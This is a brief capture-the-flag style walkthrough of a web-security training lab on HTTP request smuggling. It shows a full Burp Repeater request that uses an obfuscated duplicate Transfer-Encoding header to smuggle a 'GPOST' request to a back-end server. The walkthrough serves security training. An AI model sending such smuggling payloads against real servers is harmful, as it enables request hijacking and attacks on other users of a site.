HTTP request smuggling, obfuscating the TE header
This lab involves a front-end and back-end server, and the front-end server doesn’t support chunked encoding.
Reproduction and proof of concept
In Burp Suite, go to the Repeater menu and ensure that the “Update Content-Length” option is unchecked.
Using Burp Repeater, issue the following request twice:
POST / HTTP/1.1 Host: lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
The second response should say:
Unrecognized method GPOST.
An attacker will need to smuggle a request to the back-end server, so that a subsequent request for
/ (the web root) triggers a
404 Not Found response.